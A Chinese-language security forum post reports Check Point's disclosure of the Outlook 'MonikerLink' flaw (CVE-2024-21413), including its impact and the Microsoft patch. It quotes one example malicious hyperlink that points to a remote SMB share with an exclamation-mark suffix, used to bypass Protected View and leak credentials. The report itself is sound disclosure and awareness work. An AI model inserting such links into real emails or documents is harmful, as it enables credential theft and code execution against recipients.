-
-
[分享]一个叹号可导致任意代码执行,Windows生态系统也曝“log4j漏洞”
-
发表于:
2024-2-18 18:25
5095
-
[分享]一个叹号可导致任意代码执行,Windows生态系统也曝“log4j漏洞”
据Check Point Research官网博客,其最近一项研究揭示了Microsoft Outlook中的一个重大安全漏洞,允许攻击者在受害者的计算机上执行任意代码。微软已确认此漏洞,并且给予了该漏洞9.8分(满分10分)的CVSS严重性评分。
Outlook是Microsoft Office套件中的一个较为流行的桌面应用程序,常被全球组织用于发送接收电子邮件、安排会议等。
据了解,Check Point的安全研究员Haifei Li发现了此漏洞(CVE-2024-21413),并将之命名为#MonikerLink。当用户使用易受攻击的Microsoft Outlook版本点击带有恶意链接的电子邮件时,就会导致远程代码执行(RCE),并且该漏洞还使攻击者能够绕过Office文档的受保护视图。通常而言,钓鱼邮件攻击链需要一次双击和一次单击;而当攻击者利用上“Moniker Link”漏洞,那么就只需要一次单击。
Check Point表示,其已确认这个#MonikerLink漏洞在最新的Windows 10/11 + Microsoft 365(Office 2021)环境中存在,并且其他Office版本也可能受到影响。Check Point认为这是一个被忽视的问题,它在Windows/COM生态系统中存在了几十年——因为它存在于COM API的核心。
该漏洞源于Outlook错误地解析特制的超链接以访问COM对象。攻击者能以一个叹号绕过内置的Outlook保护。Check Point Research对此给出了如下示例:
*<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>*
这种类型的超链接绕过了Outlook现有的安全机制,当单击链接时,Outlook将访问“\\10.10.111.111\test\test.rtf”远程资源,而不会引发任何警告或错误。
Check Point表示,该漏洞可能允许攻击者执行一系列恶意活动,包括但不限于:
① 数据窃取:访问并窃取存储在受害者系统或其网络中的敏感信息。
② 恶意软件安装:部署恶意软件(如勒索软件、间谍软件、键盘记录器等),以进一步破坏受害者的系统或在网络中传播。
③ 特权提升:利用泄漏的凭据或任意代码执行来获得受害者系统或网络的更高权限,可能导致整个系统或网络被攻破。
④ 身份盗窃:利用窃取的NTLM凭据冒充受害者,进行欺诈活动或访问机密资源。
Check Point已将此问题报告给微软安全响应中心(MSRC),其在2024年2月的“补丁星期二”中修复了此漏洞,强烈建议所有Outlook用户尽快更新。
博客链接:https://blog.checkpoint.com/research/check-point-research-unveils-critical-monikerlink-vulnerability-in-microsoft-outlook-with-a-9-8-cvss-severity-score/
编辑:左右里
资讯来源:Check Point Research
转载请注明出处和本文链接
[招生]系统0day安全班,企业级设备固件漏洞挖掘,Linux平台漏洞挖掘!